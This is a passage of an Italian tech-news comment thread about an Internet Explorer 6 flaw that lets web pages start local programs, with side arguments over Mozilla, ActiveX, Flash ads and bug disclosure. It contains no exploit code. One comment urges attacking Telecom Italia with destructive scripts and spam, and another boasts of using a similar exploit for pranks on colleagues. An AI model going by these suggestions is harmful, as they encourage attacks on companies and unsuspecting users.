          di utilizzo girando nei siti piu distarati
          non ho mai avuto nessun tipo di problema.ecco il punto! Se sei un utente consapevole di quello che fai non correrai mai nessun rischio...certo che finche' ci sarà gente che scarica il programmino per vedere le donnine nude e poi scoprono che il programmino crea una connessione ras e chiama un 166.....
        • Anonimo scrive:
          Re: IE al 90% su PI
          - Scritto da: birillom
          io utilizzo ie al lavoro e a casa ed in anni
          di utilizzo girando nei siti piu distarati
          non ho mai avuto nessun tipo di problema.A lavoro ho provato a lasciare IE in alcune stazioni, ma dopo due giorni avevano gia` beccato dei virus (e non dalla posta che quella e` filtrata da un server, Linux ovviamente).Soluzione: ho installato Mozilla, e moltinon si sono neppuri accorti della differenza (iosi, perche` non hanno piu` beccato niente).
      • Anonimo scrive:
        Re: IE al 90% su PI
        Mi rendo conto che dovrei scrivere meno di fretta ^__^
  • Anonimo scrive:
    OT: PI via il suono dalla pubb. IBM
    grido disperato e molto OT:"Punto Informatico, per favore, evita di pubblicare la pubblicità della IBM con la musica.... tutte le volte che si apre una notizia si è costretti a cliccare sull'iconcina maledettamente piccola per togliere l'audio... visto che l'audio di flash non si puo' regolare e non vogliamo schiattare di infarto a 30 anni, ti preghiamo di non continuare a supportare i banner con musica... grazie."
    • Anonimo scrive:
      Re: OT: PI via il suono dalla pubb. IBM
      Mi metto in coda e sottoscrivo, vada per la pubblicità invasiva e di cattivo gusto ma NON LA MUSICAA!!!!!!!!!!!!!
    • Anonimo scrive:
      Re: OT: PI via il suono dalla pubb. IBM
      Sottoscrivo in pieno
    • Anonimo scrive:
      Re: OT: PI via il suono dalla pubb. IBM
      Confermo e sottoscrivo
    • Anonimo scrive:
      Re: OT: disabilita FLASH
      tanto a cosa serve????se un designer ha voglia di sbattersi fa le stesse cose con DHTML-CSS-Javascript,anzi le fa meglio...me lo devono ancora spiegare a che serve flash.forse a farti sbarluccicare gli occhi e non guardare i contenuti...mah, mi sa proprio di si.
      • Anonimo scrive:
        Re: OT: disabilita FLASH
        dai, designer coi coglioni, fammi vedere le stesse cose che ci sono in sti banner fatte in DHTML-CSS-Javascript...Se ci riesci in meno di 6 mesi GIuRO che ti do un premio....
        • Anonimo scrive:
          Re: OT: disabilita FLASH
          - Scritto da: Gino
          dai, designer coi coglioni, fammi vedere le
          stesse cose che ci sono in sti banner fatte
          in DHTML-CSS-Javascript...

          Se ci riesci in meno di 6 mesi GIuRO che ti
          do un premio....http://ad.it.doubleclick.net/758522/lotus_122a_336x280_it.gifmi partono in automatico non avendo installato flash.:-))))))come vedi sono uguali :)))
        • Anonimo scrive:
          Re: OT: disabilita FLASH
          - Scritto da: Gino
          dai, designer coi coglioni, fammi vedere le
          stesse cose che ci sono in sti banner fatte
          in DHTML-CSS-Javascript...

          Se ci riesci in meno di 6 mesi GIuRO che ti
          do un premio....il premio!!!voglio il mio premio gino!!!!
          • Anonimo scrive:
            Re: OT: disabilita FLASH
            non vale, in un gif non c'e' l'audio :-P
          • Anonimo scrive:
            Re: OT: disabilita FLASH
            - Scritto da: cippa
            non vale, in un gif non c'e' l'audio :-Pma non era dal fatto che non volevamo l'audio che avevamo aperto sto thread? :-P
          • Anonimo scrive:
            Re: OT: disabilita FLASH
            e' un dettaglio trascurabile ;-)
    • Anonimo scrive:
      Re: OT: PI via il suono dalla pubb. IBM
      Sottoscrivo anch'io
    • Anonimo scrive:
      Re: OT: PI via il suono dalla pubb. IBM
      ma sei un idolo, io non l'avevo nemmeno vista l'iconcina... prima di aprire PI generalmente tolgo l'audio ;)sono d'accordo come credo tutti: i banner sono ottimi quando aiutano a tenere un servizio gratuito... ma l'audio e' estremamente fastidioso.
    • Anonimo scrive:
      Re: OT: PI via il suono dalla pubb. IBM
      Anch'io non ne posso piu' della musica che parte all'apertura di una finestra; poi se le finestre aperte sono due o piu'... 8-(
    • Anonimo scrive:
      Re: OT: PI via il suono dalla pubb. IBM
      - Scritto da: DB2 vincente su Bari
      grido disperato e molto OT:
      "Punto Informatico, per favore, evita di
      pubblicare la pubblicità della IBM con la
      musica.... tutte le volte che si apre una
      notizia si è costretti a cliccare
      sull'iconcina maledettamente piccola per
      togliere l'audio... visto che l'audio di
      flash non si puo' regolare e non vogliamo
      schiattare di infarto a 30 anni, ti
      preghiamo di non continuare a supportare i
      banner con musica... grazie."Curati ......pensa alla salute !!
    • Anonimo scrive:
      Re: OT: PI via il suono dalla pubb. IBM
      che utonti che siete!! :DDDbasta installare uno dei tanti banner killer che ci sono in circolazione e...voilà, niente banner, niente musica, caricamento più rapido della pagina etc. etc..parlate di meno e agite di più, fessacchiotti! :)
      • Anonimo scrive:
        Re: OT: PI via il suono dalla pubb. IBM
        esatto :) e se tutti facessero come consigli tu, un domani... voila'! niente + PI ne' altri siti che vivono di banner ;-)
  • Anonimo scrive:
    Bufala
    Su io programo era uscito un articolo simile e riusciva se non erro ad aprire solo programmi non nocivi e comunque non e' per niente una novita'. Mi dispiace per mistersecurity
    • Anonimo scrive:
      Re: Bufala
      - Scritto da: Walter
      Su io programo era uscito un articolo simile
      e riusciva se non erro ad aprire solo
      programmi non nocivi e comunque non e' per
      niente una novita'. Mi dispiace per
      mistersecurityScusa, ci dai una definizione di programma non nocivo?Come si fa a distinguerlo da uno pressapoco nocivo?
      • Anonimo scrive:
        Re: Bufala
        Ti do una definizione di paranoia e accanimento contro la Microsoft: "dualhost".
        • Anonimo scrive:
          Re: Bufala
          - Scritto da: aassaa
          Ti do una definizione di paranoia e
          accanimento contro la Microsoft: "dualhost".Esatto.
        • Anonimo scrive:
          Re: Bufala
          - Scritto da: aassaa
          Ti do una definizione di paranoia e
          accanimento contro la Microsoft: "dualhost".Adesso segnalare le falle e i gravi buchi disicurezza e` diventato paranoia e accanimento???Invece eravate tutti pronti a gridare allo scandalo quando e` uscito la falla di Mozilla... ma fatemi il piacere.
  • Anonimo scrive:
    Maddechè! Su IoProgrammo di Maggio02 c'era già!
    Numero 58 della rivista "io Programmo".Questo exploit spiegato e con tanto di codice da testare.L'ho pure provato x eseguire qualche flash projector (exe) x scherzetti infami ai colleghi.Mah???
    • Anonimo scrive:
      Re: Maddechè! Su IoProgrammo di Maggio02 c'era già!
      Mi dispiace, l'exploit di cui parli e' vecchio di mesi ma era diverso da questo, credo se ne sia pure parlato qui su PI... Certo, due buchi del genere in pochi mesi sono un pochino troppi!
  • Anonimo scrive:
    E' molto grave
    Windows XpInternet Explorer 6Ultime patch e vecchie patch installate Eppure anche sul mio pc è presente il baco e sono riuscito a far partire tutte le applicazioni che volevo.Speriamo in un veloce rimedio
    • Anonimo scrive:
      Re: E' molto grave
      Grazie... se la patch che corregge questa falla ancora non è uscita come puoi pretendere di tapparla con quelle vecchie ?!?!?SVEGLIAAAAAAAAAAAAAAAAAAAAAAAAA
    • Anonimo scrive:
      Re: E' molto grave
      Perchè non sfuttare i bachi per mettere in ginocchio i bastardi di telecom italia?Un bel sito con qualche script distuttivo ed un po' di spam verso @telecomitalia.itdai dai dai dai!!!!!!!!!!!!!!!!!!!!!!!!--nns- Scritto da: Crazy
      Windows Xp
      Internet Explorer 6
      Ultime patch e vecchie patch installate
      Eppure anche sul mio pc è presente il baco e
      sono riuscito a far partire tutte le
      applicazioni che volevo.

      Speriamo in un veloce rimedio
  • Anonimo scrive:
    Ma figurati se il buco e' un problema
    Voglio dire quanta gente cerchera' di sfruttare questo buco? Ci vuole una bella sfiga per incappare in una trappola. Gli utenti di I-E possono dormire sogni tranquilli, e' piu' probabile che la Sicilia sia assorbita dalla Libia.
    • Anonimo scrive:
      Re: Ma figurati se il buco e' un problema
      Invece è assai facile, grazie ai maniaci opensorciari il cui ultimo scopo è seppellire la Microsoft (esaltandosi come gallinelle appena esce la notiziola sul bachetto).
      • Anonimo scrive:
        Re: Ma figurati se il buco e' un problema
        se pensare questo ti fa sentire meglio... accomodati pure
        • Anonimo scrive:
          Re: Ma figurati se il buco e' un problema
          - Scritto da: A.C.
          se pensare questo ti fa sentire meglio...
          accomodati pureper quanto riguarda gli utenti open source di pi è cosi. lo evidenziano i post quando esce una notizia di qualsiasi tipo su microsoft.
          • Anonimo scrive:
            Re: Ma figurati se il buco e' un problema

            per quanto riguarda gli utenti open source
            di pi è cosi. lo evidenziano i post quando
            esce una notizia di qualsiasi tipo su
            microsoft.Sono troll come te.
        • Anonimo scrive:
          Re: Ma figurati se il buco e' un problema
          Non lo penso io, lo dimostrano i fatti.
          • Anonimo scrive:
            Re: Ma figurati se il buco e' un problema
            - Scritto da: 777
            Non lo penso io, lo dimostrano i fatti.Quali fatti ?
    • Anonimo scrive:
      Re: Ma figurati se il buco e' un problema
      - Scritto da: Nema Problema
      Voglio dire quanta gente cerchera' di
      sfruttare questo buco? Ci vuole una bella
      sfiga per incappare in una trappola. Gli
      utenti di I-E possono dormire sogni
      tranquilli, e' piu' probabile che la Sicilia
      sia assorbita dalla Libia.Non ti sei firmato "Responsabile Microsoft Italia"?Nemmeno ammettete i vostri sbagli???Quando il buco era in Mozilla tutti pronti a gridare e sbavare di gioia (perche` non siete gliunici a soffrire?), peccato che Mozilla abbia chiuso il buco in un paio di giorni mentre MS sela dorme come al solito, alla faccia della efficienza del mercato non opensource.Il buco c'e` ed e` grave, e io non lascerei collegata una macchina su Internet a lungo se nonvuoi ritrovarti tutti i tools dei cracker installati e scoprire che la tua macchine e` utilizzata per scopi che tu non approvi...
    • Anonimo scrive:
      Re: Ma figurati se il buco e' un problema

      e' piu' probabile che la Sicilia
      sia assorbita dalla Libia.Se abitassi in Sicilia inizierei a preoccuparmi di Gheddaffi! Le ultime parole famose!
  • Anonimo scrive:
    PALLADIUM alla riscossa!
    Sta arrivando... lo sentite? Avanza lento e possente il nuovo sistema M$. Un mostro di sicurezza, nulla potrà penetrarlo! Spazzerà via per sempre tutti i pirati informatici! Un colosso invincibile ed implacabile contro la pirateria...Ma... cosa? Che succede?STOP: EFFFx0E00 - User error. Please remove the T-shirt and type any key to try to continue.Ehm si, in effetti si è accorto che l'utilizzatore indossava una maglietta Lacuste non originale... Ma non preoccupatevi risolveremo tutto con il ServicePack 1.000 intanto usate il PC nudi.
    • Anonimo scrive:
      Re: PALLADIUM alla riscossa!
      ROTFL :)
    • Anonimo scrive:
      Re: PALLADIUM alla riscossa!
      - Scritto da: Ma per favore!
      Ehm si, in effetti si è accorto che
      l'utilizzatore indossava una maglietta
      Lacuste non originale... Ma non
      preoccupatevi risolveremo tutto con il
      ServicePack 1.000 intanto usate il PC nudi.LOL :-D !
    • Anonimo scrive:
      Re: PALLADIUM alla riscossa!
      Io avevo pensato subito ai langolieri...:-)
  • Anonimo scrive:
    Come mi salvo?
    Sul mio Windows ho IE 6.0. Ora che devo fare?
    • Anonimo scrive:
      Re: Come mi salvo?
      - Scritto da: Antonio
      Sul mio Windows ho IE 6.0. Ora che devo fare?Butta via tutto! :-)))))
    • Anonimo scrive:
      Re: Come mi salvo?
      Uomini sganciare le scialuppe!Avanti donne e bambini!:)
    • Anonimo scrive:
      Re: Come mi salvo?
      - Scritto da: Antonio
      Sul mio Windows ho IE 6.0. Ora che devo fare?prova mozilla http://www.mozilla.org magari ti piace e lo sostituisci ad IE, alla peggio hai occupato il tempo mentre aspetti che la microsoft rilasci una patch :)
      • Anonimo scrive:
        Re: Come mi salvo?
        - Scritto da: z2
        - Scritto da: Antonio

        Sul mio Windows ho IE 6.0. Ora che devo
        fare?
        prova mozilla http://www.mozilla.org magari
        ti piace e lo sostituisci ad IE, alla peggio
        hai occupato il tempo mentre aspetti che la
        microsoft rilasci una patch :)Mozilla non e' all'altezza, non ancora. Che suggerimenti dai??
        • Anonimo scrive:
          Re: Come mi salvo?
          - Scritto da: Franky
          Mozilla non e' all'altezza, non ancora. Che
          suggerimenti dai??io uso mozilla 1.0 e personalmente lo trovo all'altezza; potresti gentilmente dirmi che versione di mozilla hai provato e in cosa lo hai trovato carente?
          • Anonimo scrive:
            Re: Come mi salvo?
            comunque non basta per occupare tutto il tempo che passerà prima della patch...può scaricarseli tutti i browser ;-)
          • Anonimo scrive:
            Re: Come mi salvo?
            - Scritto da: z2
            - Scritto da: Franky

            Mozilla non e' all'altezza, non ancora.
            Che

            suggerimenti dai??
            io uso mozilla 1.0 e personalmente lo trovo
            all'altezza; potresti gentilmente dirmi che
            versione di mozilla hai provato e in cosa lo
            hai trovato carente?Beh non mi verrai a dire che il rendering e il supporto ad ActiveX e' all'altezza. In piu' ci sono un sacco di siti che fanno casini.
          • Anonimo scrive:
            Re: Come mi salvo?
            Cooosa? Il Supporto ad ActiveX non è altezza?In un browser? Ma sai che vuol dire? Ma se MS decide che il suo browser deve leggerti il pensiero, gli altri browser per essere validi dovrebbero fare altrettanto?ActiveX deve stare fuori dai coglioni.. non è fatto per girare in un browser: te lo dice uno che ha lavorato con IIS e ASP e faceva applicazioni web con tanto di porcherie ActiveX infilate dentro, e poi si è accorto che non era proprio il caso di riempire i browser degli utenti con simili sciocchezze.Se proprio non si vuole fare a meno di oggetti per potenziare il proprio sito, si usino applet o flash (o meglio svg).
          • Anonimo scrive:
            Re: Come mi salvo?
            - Scritto da: Franky
            Beh non mi verrai a dire che il rendering e
            il supporto ad ActiveX e' all'altezza. In
            piu' ci sono un sacco di siti che fanno
            casini.per quanto riguarda acticex ti hanno gia' risposto, passando al rendering gecko e' sotto molti punti di vista il miglior motore di rendering in circolazione.I siti che fanno casini li fanno perche' non si attengono agli standard ( http://www.w3.org/ ), quindi i 'casini' non sono in alcun modo imputabili al browser.
          • Anonimo scrive:
            Re: Come mi salvo?

            per quanto riguarda acticex ti hanno gia'
            risposto, Si l'ho letta anch'io. Una risposta contro M$ e poco sensata visto che ActiveX e' fico.
            passando al rendering gecko e'
            sotto molti punti di vista il miglior motore
            di rendering in circolazione.Vallo a dire ai poveracci che usano N6.x
          • Anonimo scrive:
            Re: Come mi salvo?
            - Scritto da: Cluster
            visto che ActiveX e' fico.a allora se e' "fico" scusami hai ragione.

            passando al rendering gecko e'

            sotto molti punti di vista il miglior
            motore

            di rendering in circolazione.

            Vallo a dire ai poveracci che usano N6.xche c'entra? netscape ha ben altri problemi
          • Anonimo scrive:
            Re: Come mi salvo?
            - Scritto da: Cluster

            per quanto riguarda acticex ti hanno gia'

            risposto,

            Si l'ho letta anch'io. Una risposta contro
            M$ e poco sensata visto che ActiveX e' fico.perché poco sensata?vuoi spiegarmi sotto quali aspetti *tecnici* activex è "fico"?

            passando al rendering gecko e'

            sotto molti punti di vista il miglior
            motore

            di rendering in circolazione.

            Vallo a dire ai poveracci che usano N6.xe perché? se continuano ad usarlo mica è colpa mia... che si aggiornino! o vogliamo parlare di quell'aborto di IE3.0?
          • Anonimo scrive:
            Re: Come mi salvo?
            - Scritto da: Franky

            Beh non mi verrai a dire che il rendering e
            il supporto ad ActiveX e' all'altezza. In
            piu' ci sono un sacco di siti che fanno
            casini.ah, adesso il supporto ad AcriveX è indispensabile per la navigazione... ma ti è mai venuto in mente che ActiveX è di Microsoft? come pretendi che lo supporti un browser non-microsoft e perdipiù multipiattaforma?quanto al rendering delle pagine... impara cosa significa perché se ne parli così alla leggera evidentemente l'hai sentito dire da qualche parte e non sai nemmeno cos'è.ciaogodz
          • Anonimo scrive:
            Re: Come mi salvo?
            - Scritto da: Franky
            In piu' ci sono un sacco di siti che fanno
            casini.Visto che sono un sacco puoi dirne qualcuno perverificare?? Con che versioni hai avuto tuttiquesti problemi e in cosa consistevano esattamentequesti casini??Te lo chiedo perche` e` da molti mesi che uso sia Netscape 6.2 che Mozilla 0.9.x - 1.0 e non ho maiavuto problemi di rendering o siti "incasinati"
        • Anonimo scrive:
          Re: Come mi salvo?
          - Scritto da: Franky

          Mozilla non e' all'altezza, non ancora. Che
          suggerimenti dai??non è all'altezza di IE?ma... l'hai provato??
        • Anonimo scrive:
          Re: Come mi salvo?
          - Scritto da: Franky
          Mozilla non e' all'altezza, non ancora. Che
          suggerimenti dai??Perche` IE e` mai stato all'altezza? Semplicementee` quello preinstallato su tuttti i PC e questobasta per usarlo.
    • Anonimo scrive:
      Re: Come mi salvo?
      Hm... ti conviene spegnere il pc, staccare l'alimentatore e appendere sul monitor un cartello con scritto "Opo!tpop!bccbtubo{b!twfhmjp!qfs!vujmj{{bsf!vo!QD/".
      • Anonimo scrive:
        Re: Come mi salvo?
        - Scritto da: cippa
        Hm... ti conviene spegnere il pc, staccare
        l'alimentatore e appendere sul monitor un
        cartello con scritto
        "Opo!tpop!bccbtubo{b!twfhmjp!qfs!vujmj{{bsf!vUn consiglio per niubbi insomma
    • Anonimo scrive:
      Leggi il mio post sulle mamme sempre incinta ;-)
      Visto che nessuno l'ha letto o commentato o citato, devo farlo io... bah!Brutta cosa crogiolarsi in maniera inconcludente, sapendo (o no? beata ignoranza) che puo' esistere una soluzione; ripeto, buchi, service packs, raccomanded patches ce ne saranno sempre, sia per Win che per Solariz, HP-UXz e Linuz, ma evitare a priori di studiare e cercare una soluzione e' tutto tranne che costruttivo... Ciao!
    • Anonimo scrive:
      Re: Come mi salvo?
      hai provato con il gas? =)
    • Anonimo scrive:
      Re: Come mi salvo?
      Cancelli quella porcheria che si chaiam uindous e installi un bel Linux !- Scritto da: Antonio
      Sul mio Windows ho IE 6.0. Ora che devo fare?
      • Anonimo scrive:
        Re: Come mi salvo?
        - Scritto da: Memo Remigi
        Cancelli quella porcheria che si chaiam
        uindous e installi un bel Linux !
        ...oppure installi un'altro browser, io personalmente con Netscape 6.2 mi trovo bene.Linux ha molti lati positivi ma i signori linuxari devono tenere presente che non è detto che sia il sistema operativo adatto a tutti, richiede conoscenze e tempo.E' un po' come se tutti quelli che hanno la patente dovessero essere in grado di riparsi il motore della macchina da soli! ;)P.S.: uso anche Linux (a volte con un po' di fatica)
    • Anonimo scrive:
      Re: Come mi salvo?
      - Scritto da: Antonio
      Sul mio Windows ho IE 6.0. Ora che devo fare?Installa Mozilla 1.0 e usa quello per navigare,scordati di IE.
  • Anonimo scrive:
    E per fortuna.....
    che c'è gente "irresponsabile" che trova questi buchi. Pensate se veramente tutti quelli che avevano trovato i bugs se l'avessero detto solo alla M$, adesso avremmo Windows Gruviera 2002!
    • Anonimo scrive:
      Re: E per fortuna.....
      appunto... e pensa che c'è anche chi si lamenta del fatto che i bugs vengano resi pubblici!!!
    • Anonimo scrive:
      Re: E per fortuna.....
      - Scritto da: Bilbo
      che c'è gente "irresponsabile" che trova
      questi buchi. Pensate se veramente tutti
      quelli che avevano trovato i bugs se
      l'avessero detto solo alla M$, adesso
      avremmo Windows Gruviera 2002!I buchi vanno resi noti A TUTTI.Gli exploit per sfruttarli no. Questi ultimi vanno segnalati SOLO AL PRODUTTORE.Molto semplice.Cosa ne pensi?
      • Anonimo scrive:
        Re: E per fortuna.....
        e' gia' la seconda volte che lo dici... ma guarda che se passare dalla descrizione del baco all'exploit e' molto piu' facile che trovare un baco di cui non conosci l'esistenza e POI pensare al possibile exploit, pensaci un po' su...
        • Anonimo scrive:
          Re: E per fortuna.....
          - Scritto da: cippa
          e' gia' la seconda volte che lo dici... ma
          guarda che se passare dalla descrizione del
          baco all'exploit e' molto piu' facile che
          trovare un baco di cui non conosci
          l'esistenza e POI pensare al possibile
          exploit, pensaci un po' su...E quindi?Rivelando il baco metti al corrente tutti (utenti e azienda) e RISCHI che qualcuno trovi l'exploit che già c'è.Rilevando l'exploit metti al corrente tutti (utenti e azienda) e HAI LA CERTEZZA che tutti possano usare l'exploit.A parte voler danneggiare M$ non vedo perchè si debba scegliere la seconda. O mi sbaglio?
          • Anonimo scrive:
            Re: E per fortuna.....
            non ti sbagli affatto :) intendevo dire che e' meglio non rivelare affatto il bug, se non a chi possiede i mezzi per risolverlo...
  • Anonimo scrive:
    Funziona :((
    L'unica cosa che funzionano bene a casa Microsoft sono i bugs.Ho IE6 con tutte le ultime patch installate.
    • Anonimo scrive:
      Re: Funziona :((
      Già, funziona di brutto! :-(((Anche con file modificati, senza form...E con IE6, tutte le patch installate comprese quelle che non vengono inserite con il tanto famigerato Windows Update! :-( Che poi dovrebbero chiamarlo Windows Rebooter...
    • Anonimo scrive:
      piu del 95%
      che bello che il browser piu usato sia IE :-)che con gioia viene "difeso" da molti...io consiglierei vivamente di dimenticarsi di IE e Outlook, installarsi un firewall personale ed impedire a tutte le cosine create da mamma MS di uscire su internetper sempre (IE 5..6..e futuri... Outlook Media Player... etc etc) e di usarsi un browser vedi mozilla o ancor meglio Opera:-) per il resto fate come voleteCosa volete che sia un buco di IE per MS ha da pensare a cose piu importanti come XBOX Palladium ed altre vaccate simili....
      • Anonimo scrive:
        Re: piu del 95%
        Quello che e' *davvero* incredibile e' che il 95% delle persone utilizzano un browser per ovvi motivi di comodita', integrazione (lecita o meno) con l'OS, e perfetta compatibilita' con un buon 99% dei siti che girano su questo pianeta e ci siano persone che non capiscono il perche' di questo 95%... va bene, ogni tanto si scopre un bug, e quindi? si aspetta che venga corretto... in questo caso, per esempio, su alcune macchine il "bug" nemmeno si manifesta, segno che una patch, sotto qualche forma, era gia' stata rilascita in passato. Non discuto sul fatto che Mozilla, per dirne una, sia piu' sicuro... e' probabile :) ma quello che invece e' certo e' che in alcuni siti da problemi di navigazione (a volte gravi, magari per colpa dei web designer, ma il succo resta lo stesso), e allora mi chiedo chi me lo fa fare di girare con un browser che si rifiuta di visualizzarmi alcune immagini, che mi impagina male, eccetera solo per poter essere sicuro che nessuna pagina web creata da non si sa quale malato di mente (e soprattutto non si sa bene come ci vada a finire io) mi possa aprirmi la calcolatrice...
        • Anonimo scrive:
          Re: piu del 95%
          - Scritto da: cippa
          Quello che e' *davvero* incredibile e' che
          il 95% delle persone utilizzano un browser.....E il 5% ne utilizza un altro. Evidentemente perchè si trovano meglio. Mi sembra ovvio....Io normalmente uso Linux e quindi ovviamente non posso usare IExplorer. Invece uso Mozilla. In realtà mi trovo molto bene e lo uso anche sotto Windows. E' più stabile ed inoltre trovo molto utili i tab. Cosa c'è di male ?E non sto parlando di bug o vulnerabilità. Quelli sono stati scoperti in passato anche su Mozilla.
          era gia' stata rilascita in passato. Non
          discuto sul fatto che Mozilla, per dirne
          una, sia piu' sicuro... e' probabile :) ma
          quello che invece e' certo e' che in alcuni
          siti da problemi di navigazione (a volte
          gravi, magari per colpa dei web designer, ma
          il succo resta lo stesso), e allora mi
          chiedo chi me lo fa fare di girare con un
          browser che si rifiuta di visualizzarmi
          alcune immagini, che mi impagina male,Ti posso assicurare che i siti così sono molto pochi. In genere i problemi sono dovuti solo la mancanza di qualche plugin (in genere flash) che su IExplorer sono compresi, mentre su Mozilla vanno installati a parte.
          eccetera solo per poter essere sicuro che
          nessuna pagina web creata da non si sa quale
          malato di mente (e soprattutto non si sa
          bene come ci vada a finire io) mi possa
          aprirmi la calcolatrice...Beh, uno che ti si prende la briga di creare un sito con un codice che sfrutta una vulerabilità e in tal modo ti apre la calcolatrice è effettivamente MOOLTO malato di mente. Il problema è se è un po' meno (o un po' più) malato di mente.....
        • Anonimo scrive:
          Re: piu del 95%
          tutto dipende dal fatto che ormai i siti non li fanno secondo lo standard internazionale ( con mozilla o netscape o opera non hai nessun problema sui siti standard), ma li fanno per explorer, perchè tutti hanno explorer.quindi se per pigrizia non state utilizzando un altro browser o meglio un altro Sistema Operativo, correte inevitabilmente dei rischi.io faccio parte del 5% rimanente, e a differenza del 95% che si preoccupa per la notizia riportata, io leggo divertito!!
        • Anonimo scrive:
          Re: piu del 95%
          Okkei..... :-)IE permetterebbe la corrtee visione di quei siti scritti con i piedi... che bello...leggitimiamo allora i webmaster e i webdesigner a scrivere un sito che si veda perfettamente sotto IE autorizziamo a scrivere pagine ricolme di estensioni solo di IE cosi useremo solo IE....Esistono degli Standard! per la madonna....Standard! NON standard Microsoft...chi progetta e realizza siti web deve adoperarsi per mantenere il massimo livello di compatibilità chi non lo fa, non fa un buon lavoro... punto e basta...Se io visito un sito che funziona solo con IE sono certo di visualizzare un sito pessimo anche se sotto IE è mirabolante....Internet NON è l'iconcina di IE.....Questo la gente lo deve capire!!!! Altrimenti il futuro non sara roseo... per l'informatica....ARIMAN/MOSCA
          • Anonimo scrive:
            Re: piu del 95%
            - Scritto da: ARIMAN/MOSCA

            Okkei..... :-)


            IE permetterebbe la corrtee visione di quei
            siti scritti con i piedi... che bello...

            leggitimiamo allora i webmaster e i
            webdesigner a scrivere un sito che si veda
            perfettamente sotto IE autorizziamo a
            scrivere pagine ricolme di estensioni solo
            di IE cosi useremo solo IE....
            Esistono degli Standard! per la madonna....
            Standard! NON standard Microsoft...
            chi progetta e realizza siti web deve
            adoperarsi per mantenere il massimo livello
            di compatibilità chi non lo fa, non fa un
            buon lavoro... punto e basta...

            Se io visito un sito che funziona solo con
            IE sono certo di visualizzare un sito
            pessimo anche se sotto IE è mirabolante....

            Internet NON è l'iconcina di IE.....
            Questo la gente lo deve capire!!!!
            Altrimenti il futuro non sara roseo... per
            l'informatica....

            ARIMAN/MOSCA

            Sono perfettamente d'accordo con te, purtroppo la realta` e` diversa. E la realta` non e` rosea, da un bel pezzo.Informatica professionale e industriale: tutto meno che microsoft.Segretarie e uffici di contabilita`: microsoft.Idioti: power point.E-mail: elm.Forza e coraggio, che il sito della azienda per cui lavoro e` "ottimizzato per IE 5.0 o successivo"...
          • Anonimo scrive:
            Re: piu del 95%
            - Scritto da: dualhost
            purtroppo la realta` e` diversa. E la
            realta` non e` rosea, da un bel pezzo.
            Informatica professionale e industriale:
            tutto meno che microsoft.
            Segretarie e uffici di contabilita`:
            microsoft.
            Idioti: power point.
            E-mail: elm.dissento sull'informatica industriale...MS non è certo predominante. Anche a livello enterprise MS occupa ruoli sicuramente importanti ma non da "pole position".
            Forza e coraggio, che il sito della azienda
            per cui lavoro e` "ottimizzato per IE 5.0 o
            successivo"...Mi sembra che il pionierismo che da ormai anni caratterizza la rete si traducesse già ai tempi in cui Netscape aveva percentuali rilevanti in un bailamme di siti che andavano sulla 4.5 ma non sulla 4.6 , ottimizzati per questo o per quell'altro.Oggi , in cui c'e' una netta predominanza di mercato da parte di un navigatore , solo i portali più grossi possono permettersi di spendere in sviluppo di compatibilità con browsers che hanno percentuali da prefisso telefonico: nel loro caso anche quella piccola percentuale si traduce in un numero elevato di visitatori di cui si deve tener conto.Ma un sito che fa diecimila accessi al giorno (quindi medio) , mi spieghi perche' dovrebbe sbattersi per andare dietro le cagate di Netscape?E te lo dice uno che usa Mozilla 1.1 .Il fatto è che in teoria abbiamo ragione a sdegnarci xchè non si seguono gli standard o in generale perche' qualcuno non fa il suo lavoro con professionalità , ma non possiamo essere ciechi e non considerare anche la pragmatica realtà economica , senza la quale ben poco di quello che è oggi internet rimarrebbe.
          • Anonimo scrive:
            Re: piu del 95%


            Informatica professionale e industriale:

            tutto meno che microsoft.
            dissento sull'informatica industriale...MS
            non è certo predominante. Anche a livello
            enterprise MS occupa ruoli sicuramente
            importanti ma non da "pole position".
            mmmmm... impara a leggere...e comunque non è vero che informatica professionale e industriale : tutto meno che microsoft....anche microsoft ha la sua bella fettona !!!W BILLY, w i bugs che tanto mi danno da lavorare
          • Anonimo scrive:
            Re: piu del 95%
            - Scritto da: simone
            mmmmm... impara a leggere...visto che pensi di potermi rivolgere inviti simili , dovresti forse essere certo di essere a posto tu nel merito:
            anche microsoft ha la sua bella fettona !!!
            W BILLY, w i bugs che tanto mi danno da
            lavorare questo invece quello che ho detto io:

            Anche a livello

            enterprise MS occupa ruoli sicuramente

            importanti ma non da "pole position". Allora , chi è che deve imparare a leggere prima di postare?
          • Anonimo scrive:
            Re: piu del 95%
            non è che "deve sbattersi per seguire tutti i browsers". deve semplicemente seguire gli standard, e puoi stare sicuro che siti grossi fatti secondo standard ce ne sono, molte tecnologie (sia open che closed) lo consentono e chi non lo fa ha solo due scuse: la pigrizia e il fatto di essere, magari, prezzolato da microsoft (ricordi il sito dell'Agip? ancora non si è capito perché non andava su browser != IE). non ci sono motivi *reali* per non seguire gli standard W3C. chi non lo fa non è un professionista serio. tutto qui. IMNSHO, naturalmente.ciaogodz
          • Anonimo scrive:
            Re: piu del 95%
            - Scritto da: bertinottovirtuale
            Ma un sito che fa diecimila accessi al
            giorno (quindi medio) , mi spieghi perche'
            dovrebbe sbattersi per andare dietro le
            cagate di Netscape?E chi e` quella azienda che puo` permettersidi "sputare" su 500 potenziali clienti???Diciamo la verita`, non e` uno sforzo immanebasta tenere il sito web piu` semplice, il chee` solo un bene (piu` semplice = piu` veloce epiu` facilmente utilizzabile)
          • Anonimo scrive:
            Re: piu del 95%
            - Scritto da: dualhost
            Idioti: power point.Da dove ti viene quest'idea malsana?
        • Anonimo scrive:
          Re: piu del 95%
          Devi ricordarti che Microsoft = monopolio, tu sei uno schiavo del potere e del sistema, non hai libertà di scelta, il mondo necessità di alternative (che infatti ci sono, anche se non vengono scelte), che Bill Gates ha l'alito cattivo e che il pinguino è l'animale più bello della terra (lo supera solo il mio gatto). Inoltre anche se non ti conosco posso dire chea) sei un utontooippure, se cerchi risposte pro-microsoftb) sei un trollE se rispondi, comunque sia io troverò altre risposte per dimostrarti che sei un povero imbecille, che non ha capito niente e che "vedrai poi tra 10 anni quando la tua autoradio sarà marchiata Microsoft, cosa succederà".Un po' quello che succede oggi con la Enel, unico fornitore di corrente elettrica in Italia, da sempre. Non si va avanti, è un disastro totale, essendoci un regime di monopolio assoluto. Idem con Telecom (vivere è impossibile).Io ho un open-cycle che se la usiamo tutti finisce per generare corrente elettrica per metà Italia. Interessa?
        • Anonimo scrive:
          Re: - x -
